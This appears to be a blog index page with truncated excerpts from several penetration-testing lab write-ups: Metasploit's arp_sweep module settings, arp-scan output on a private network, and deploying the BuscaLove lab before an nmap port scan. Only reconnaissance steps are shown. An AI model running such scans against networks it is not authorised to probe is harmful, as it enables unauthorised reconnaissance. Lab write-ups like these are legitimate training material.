 METASPLOIT FRAMEWORK USE TO  AUXILIARY MODULE FROM METASPLOIT First of all, I have used the auxiliary modules from Metasploit-Framework which could allow me Scanning, see ports, SO version, vulnerability in applications etc, where you can see at the bottom of the picture if  I use this module whose name is: auxiliary/scanner/discovery/arp_sweep  (To verify the IPs listening in the network) Now, we can observe that when I have selected in the auxiliary module I have had to do this set up  that we can observe in the second page below: INTERFACE : This I've set up the network interface that in my case is the eth0 interface. RHOSTS :This I've set up the IP Address which I am finding out that in my case is 192.168.100.0/24 (all the IP Address from network that could be possible which I am analyzing). THREADS : Are the threads; it's the fast  that I want to analyze the IP Addresses but in my case there are 15 threads because I want to analize as fast as possible...
Read more »

HOSTING

Image
HOSTING First of all, let's go to hosting machine from active directory, for it  using arp-scan to discover active hosts on the local network, identifying 192.168.88.8 as you can see in below. ┌──(kali㉿kali)-[~] └─$ sudo arp-scan -I eth0 --localnet Interface: eth0, type: EN10MB, MAC: 08:00:27:43:73:bc, IPv4: 192.168.88.5 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.88.1 d8:44:89:50:2d:a3 (Unknown) 192.168.88.8 08:00:27:98:d4:bf PCS Systemtechnik GmbH 192.168.88.9 00:e0:4c:69:66:4a REALTEK SEMICONDUCTOR CORP. 3 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 2.075 seconds (123.37 hosts/sec). 3 responded ┌──(kali㉿kali)-[~] └─$ ping -c1 192.168.88.8 PING 192.168.88.8 (192.168.88.8) 56(84) bytes of data. 64 bytes from 192.168.88.8: icmp_seq=1 ttl=128...
Read more »

LOVE

Image
BUSCALOVE First of all, I am going to do this machine from cybersecurity labs called BuscaLove which is easy Level. For it, let’s go to open Linux terminal and we have to write the command when we can see in the picture below. cd Descargas In addition, we have to depress the unzip file whose name’s buscalove.zip you can see in the picture below. Now we have to deploy the vulnerability machine whose command is sudo bash auto_deploy.sh buscalove.tar we can see in the picture below. On the other hand, to start the attack at virtual machine, we must verify if the attacker machine is in the same range of IP Address and we have to introduce this command which is ping -c 3 172.18.0.2 we can see in the picture below. As I,ve just seen the IP Address it’s in the same range of my IP Address we have to introduce the command with nmap tool which is nmap -n -Pn 172.18.0.2 -p- - -min-rate 4000 -vvv( here you can see in this picture the scanner) but I’ve got it 2 ports: 22: open ssh 80: open http No...
Read more »

CHANGE MACHINE

Image
CHANGE  First of all, let's go to hosting machine from active directory, for it  using  arp-scan  to discover active hosts on the local network, identifying  192.168.88.8   as you can see in below . ┌──(root㉿kali)-[/home/luis] └─# arp-scan -I eth0 --localnet Interface: eth0, type: EN10MB, MAC: 08:00:27:4d:8a:0f, IPv4: 192.168.88.6 WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.88.1 d8:44:89:50:2d:a3 (Unknown) 192.168.88.4 00:e0:4c:97:01:a7 (Unknown) 192.168.88.5 00:d8:61:fa:c0:4a (Unknown) 192.168.88.7 08:00:27:b1:ae:9f (Unknown) 4 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 1.848 seconds (138.53 hosts/sec). 4 responded Now, let's go execute nmap command to identify alives ports and version with this host  192.168.88...
Read more »